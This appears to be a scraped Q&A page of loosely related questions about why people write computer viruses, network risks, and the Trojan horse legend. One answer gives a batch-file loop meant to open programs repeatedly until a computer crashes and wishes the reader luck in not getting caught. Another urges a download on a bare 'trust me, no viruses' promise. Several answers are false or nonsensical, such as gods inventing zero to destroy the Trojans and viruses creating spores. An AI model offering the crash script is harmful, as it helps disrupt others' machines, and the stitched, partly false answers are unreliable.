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You know that the sad thing about life is there is always someone somewhere trying to ruin it for everyone else. These people who make these viruses, spywares and trojans aren't stupid people, actually they are quite smart but they have a burning desire to be jerks. You are right they are losers.

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Q: Why do people create viruses such as Trojans and spyware is there a reason behind it or is it just losers with too much spare time?
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What can compromise network configuration spread viruses and spyware and allow unauthorized access to data?

P2P, or a peer-to-peer network, can compromise network configuration, spread viruses and spyware, and allow access to unauthorized data. The P2P network allows peers to link together to create the network and share resources. Each computer will have equal rights and access. This leaves an obvious security risk to attacks.

Who creates viruses?

Anyone can create viruses!

Who create number 0?

The Greek Gods were angry at the Trojans. By creating the number 0, they could destroy all the Trojans until there were only 0 left.

What kind of virus make the host cell create new viruses?


What trick did the Odysseus create to win the Trojan War?

Odysseus tricked the Trojans into thinking that the Greeks had given up any hope of conquering the city and had left a wooden horse behind which the Trojans then brought into the city of Troy not knowing that there were Greeks within the horse who opened up the city gates allowing the Greeks to capture the city .

Where to find a character creator site?

The Internet is filled with character creator sites. Search for the right site for you by using search terms that describe the type of character you want to create along with your level of expertise. Be careful visiting such sites, as you may encounter spyware or viruses.

How do you get to silab?

to get silab go on this link then download the game dont worry i promise no viruses or trojans or other stuff it wont harm your computer trust me. then create a name and pass and type in the server this server is on 24/7 enjoy

How do you create a virus from the command prompt?

You cannot create a virus directly from the command prompt, but you can create one from a batch file. I only know how to create trojans, in the form below, which must be entered in a notepad. :loop start "file" goto loop where "file" is typed, enter the syntax of the file or program you want to be opened, or a website address. that file, program, or website will then be repetatively opened until the computer crashes. Multiple files, programs, and websites can be set to be opened in the following format: :loop start "file" start "file goto loop I hope this will help you, and i wish you luck in not getting caught, as creating viruses, trojans, and other malwear is illeagle.

What do viruses do when they enter the body's cells?

create resistant spores

Why do malicious hackers create viruses?

Viruses are generally created to obtain your personal information, and are the leading cause in Identity Theft.

What appears to motivate hackers to create and disseminate a virus?

Any of the following. A. Fame B. Grief (some people get a kick out of screwing things up for others) C. Greed (many trojans are used to set up huge networks of spam relays) D. Power (those same trojans can be used to make attacks on other networks) The same reasons people have for doing a lot of the things they do.

Why are some computer viruses called Trojans?

Hidden malicious programs (most are not viruses) are called "Trojans" from the story of the Trojan Horse, from the war between Greece and the city of Troy, as written in Virgil's Aeneidand referenced in Homer's The Odyssey. The trojan horse was a threat masquerading as a gift. Similarly, trojan programs seem innocuous, but are designed to damage your computer or use it for harmful purposes.---In the Trojan War, one side was the Greeks and the other was the people from Troy. They were fighting for this beautiful queen, Helen, wife of Menelaus. Eventually the Greeks saw that the Trojans were winning the war, so they devised a very clever plan: they would create a giant wooden horse (because the Trojans worshiped horses) and then leave it behind as they left, pretending to give up. The wooden horse would be a peace offering. The Trojans accepted it, took it into the city walls, and then they partied at night and got drunk. After the Trojans were sleeping, Greek soldiers hiding inside the hollow wooden horse got out and opened the city gates of Troy to let their much larger army inside. Because the Trojans were caught off guard and drunk, they had no choice but to surrender and the Greeks won the war.Trojan Horse programs work in the same way. They disguise themselves as legitimate programs or files. When you accept to download them, they infect your computer and run malicious processes in the background without you knowing. They often really do have the program that you intended to download, but they also come with a virus or something else to corrupt your computer. Hence the name, Trojan Horse or Trojan.